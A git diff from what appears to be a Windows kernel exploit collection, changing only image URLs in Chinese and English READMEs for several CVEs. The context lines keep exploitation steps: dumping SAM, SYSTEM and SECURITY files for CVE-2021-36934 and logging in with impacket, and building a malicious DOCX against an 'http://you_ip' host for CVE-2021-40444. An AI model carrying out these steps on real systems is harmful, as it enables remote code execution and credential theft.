代码来源 diff --git a/CVE-2021-33739/README_EN.md b/CVE-2021-33739/README_EN.md index 495d5b8..18e7d72 100644 --- a/CVE-2021-33739/README_EN.md +++ b/CVE-2021-33739/README_EN.md @@ -30,7 +30,7 @@ CompilerEnvironment Test system Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### ProjectSource diff --git a/CVE-2021-36934/README.md b/CVE-2021-36934/README.md index d785084..bd95d70 100644 --- a/CVE-2021-36934/README.md +++ b/CVE-2021-36934/README.md @@ -37,19 +37,19 @@ icacls C:\windows\system32\config\sam 当出现如下图所示就表明是易受攻击的机器 -![image-20210905164036648](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) +![image-20210905164036648](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) 然后需要开启系统还原,右键“此电脑->属性”,点击“系统保护->配置->启用系统保护->应用->确定” -![image-20210905164831213](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) +![image-20210905164831213](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) 然后创建系统还原点 -![image-20210905164912574](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) +![image-20210905164912574](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) 接着使用EXP即可获取到系统的SAM,SYSTEM和SECURITY文件 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) 最后使用impacket项目进行登录即可 diff --git a/CVE-2021-36934/README_EN.md b/CVE-2021-36934/README_EN.md index 0fbe460..a0c03e5 100644 --- a/CVE-2021-36934/README_EN.md +++ b/CVE-2021-36934/README_EN.md @@ -37,19 +37,19 @@ icacls C:\windows\system32\config\sam When the following figure shows the machine, it is an easy attack. -![image-20210905164036648](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) +![image-20210905164036648](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_1.png) Then you need to turn on the system restore, right key "This computer-> property", click "System Protection -> Configuration -> Enable System Protection -> Apply -> OK" -![image-20210905164831213](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) +![image-20210905164831213](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_2.png) Then create a system restore point -![image-20210905164912574](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) +![image-20210905164912574](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_3.png) Then you can get the system's SAM and SYSTEM and SECURITY files using Exp. -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-36934_Windows_10_2004_X64_4.gif) Finally, use the IMPACKET project to log in. diff --git a/CVE-2021-40444/README.md b/CVE-2021-40444/README.md index d042077..0e5aff9 100644 --- a/CVE-2021-40444/README.md +++ b/CVE-2021-40444/README.md @@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4044 可以知道,其实就是利用默认浏览器(IE)加载ActiveX -![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) +![image-20210911112944428](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) 本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用 @@ -109,7 +109,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4044 cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip ``` -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) 然后启动http服务 @@ -119,7 +119,7 @@ cd srv ; python3 -m http.server 80 接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) #### 参考项目 diff --git a/CVE-2021-40444/README_EN.md b/CVE-2021-40444/README_EN.md index eca0ee5..9d168fc 100644 --- a/CVE-2021-40444/README_EN.md +++ b/CVE-2021-40444/README_EN.md @@ -42,7 +42,7 @@ Based on the previous use of samples`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b You can know that it is to load ActiveX using the default browser (IE) -![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) +![image-20210911112944428](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) Essentially maliciously uses only the `Document.xml.Rels` files in the sample, MHTML and X-USC, which can be used as the malicious target web page, you can achieve the utilization @@ -109,7 +109,7 @@ Then use a one-touch script,`test/calc.dll`This is the absolute path you generat cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip ``` -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) Then start the HTTP service @@ -119,7 +119,7 @@ cd srv ; python3 -m http.server 80 The resulting malicious DOCX file (in the `out/` folder) is placed on the target machine (Windows 10 2004 x64), can perform success -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) #### ProjectSource diff --git a/CVE-2021-40449/README.md b/CVE-2021-40449/README.md index 2a23966..c8089e1 100644 --- a/CVE-2021-40449/README.md +++ b/CVE-2021-40449/README.md @@ -46,7 +46,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4044 测试系统Windows 10 1607 X64(演示使用的是CVE-2021-40449_1607_x64文件中的代码进行编译 -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) #### 参考项目 diff --git a/CVE-2021-40449/README_EN.md b/CVE-2021-40449/README_EN.md index d80c238..356ee93 100644 --- a/CVE-2021-40449/README_EN.md +++ b/CVE-2021-40449/README_EN.md @@ -46,7 +46,7 @@ CompilerEnvironment Test System Windows 10 1607 X64 (Demo is compiled with code in CVE-2021-40449_1607_X64 file -![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) +![image-20210911115757383](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-40449_Windows_10_1607_X64.gif) #### ProjectSource diff --git a/TestFailure/CVE-2015-0062/README.md b/TestFailure/CVE-2015-0062/README.md index fece2cf..8de0588 100644 --- a/TestFailure/CVE-2015-0062/README.md +++ b/TestFailure/CVE-2015-0062/README.md @@ -26,8 +26,8 @@ 不过很幸运,iis/sqlserver的虚拟帐户、默认的network service和local service都具有这个特权,所以在shell上或sa上用着和其他exp没什么区别。 对于win7/win8/win8.1等系统同样有效,前提是要先找到一个安装在上述系统上的sa/iis等包含特权的服务账户并执行exp。 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0062_win2008.png) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0062_win2008.png) -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0062_win2012.png) \ No newline at end of file +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0062_win2012.png) \ No newline at end of file